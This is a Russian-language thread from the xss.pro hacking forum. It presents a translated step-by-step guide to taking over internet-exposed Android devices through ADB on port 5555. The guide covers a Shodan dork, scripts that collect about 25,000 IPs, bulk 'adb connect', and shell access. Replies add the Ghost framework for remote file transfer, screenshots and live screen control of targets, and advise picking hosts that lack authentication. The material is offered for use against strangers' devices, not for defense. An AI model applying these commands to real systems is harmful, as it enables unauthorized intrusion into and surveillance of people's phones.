• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Эксплуатация Android, работающих на ADB (Android Debug Bridge)

lukas

(L3) cache
Пользователь
Регистрация
11.10.2018
Сообщения
282
Реакции
691
Эксплуатация Android, работающих на ADB (Android Debug Bridge)

Есть миллион вариантов использования Android Debug Bridge. Например, самый безобидный - это куча симок для приема sms.
Статья на английском.

Что такое ADB?
Android Debug Bridge (ADB) - это универсальный инструмент командной строки, который позволяет вам общаться с устройством. Команда ADB облегчает различные действия на андроид-устройстве, например, установка и отладка приложений, и предоставляет доступ к оболочке Unix, которую можно использовать для запуска различных команд на устройстве.

Обычно разработчики подключаются к службе ADB, установленной на устройствах Android, используя USB-кабель, но также можно использовать беспроводную связь ADB, включив демон-сервер на устройстве на TCP-порту 5555
Проверяем SHODAN используя дорк
android debug bridge product:”Android Debug Bridge”

1*UDegayuxgGO5BvreqRnK-w.png


Давайте сграбим все IP-адреса из Shodan API
Накодил однострочный скрипт bash, чтобы автоматизировать процесс
Добавьте свой api в скрипт перед выполнением
Bash:
bash shodan_adb.sh
Забрать можете здесь

1*uE1SuFUsQjC2pScDf6V4Dw.png


Получаем JSON-ответ поиска SHODAN (всего 305 страниц)

Однострочник, чтобы grep'нуть из них все ip'ы и сделать один файл
Код:
bash grep_ip.sh > ip.txt
Забрать можете тут

1*hqDLBI9m5k_rRLmJAOelOg.png

Получаем около 25k результатов
Ссылка на список здесь
Далее нам нужно добавить их в ADB, используя adb connect ip:port
Однострочное добавление всех IP-адресов из ip.txt в adb
Код:
bash adb_connect.sh
Ссылка на список здесь

1*og0l56otNCK71Wk-OFKKlQ.png

Получаем доступ к ним:
Для списка всех подключенных ADB используем
Код:
adb devices

1*LKphiaScsVb9-nTlR_Mdkg.png

Используем скрипт adb.sh, чтобы получить к ним доступ - тут
Код:
adb $(./adb.sh) shell

1*Y7jZBFHllX_7W9ZOxcLnlw.png


ГОТОВО
Код:
./logout


WWW
Ссылка на ADB (Android Debug Bridge) - https://developer.android.com/studio/command-line/adb
Ссылка на шодан - https://www.shodan.io/search?query=product:"Android+Debug+Bridge"


Автор: SaN ThosH
перевод: lukas

специально для https://xss.pro
 
А еще для эксплуатации можно использовать фреймворк Ghost. Позволяет администрировать удаленно андроид устройство (новичку) немного более удобнее, чем adb shell.

Установка:
git clone https://github.com/ParikhKadam/ghost-1.gi
cd /Ghost
chmod +x install.sh
./ghost

Сразу после запуска фреймворка набираем
set RHOST <target ip>
set RPORT <target port> (обычно 5555)
run
Чтобы узнать все виды атак, производимых фреймворком, можно вызвать справку командой help - в принципе там все расписано и интуитивно понятно.

Можно скачивать и загружать на устройство файлы, сделать скриншот экрана, запустить оболочку shell, и самое вкусное - пункт screen - позволяет наблюдать в режиме реального времени за экраном таргета, а так же управлять устройством удаленно через этот же экран.
 
Много не договорённостей. ADB работает по локальной сети и только после подтверждения на устройстве ключа RSA. Была уязвимость исправлена в бюллетени безопасности андроид 5 января 2018 года.

Вопрос: Каким образом происходит подключение из wan? Через уязвимый роутер? Либо ищет тех кто сам открыл удалённый способ подключения?
 
Много не договорённостей. ADB работает по локальной сети и только после подтверждения на устройстве ключа RSA. Была уязвимость исправлена в бюллетени безопасности андроид 5 января 2018 года.

Вопрос: Каким образом происходит подключение из wan? Через уязвимый роутер? Либо ищет тех кто сам открыл удалённый способ подключения?
Можешь поискать доступные хосты на https://www.shodan.io/search?query=android+debug+bridge по ключевым словам android debug bridge
и попробовать подключиться к ним через GHOST - большая часть хостов примет тебя как родного))
P.S. ищи хосты, у которых не написано "Authentication is required" и будет тебе счастие )))
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх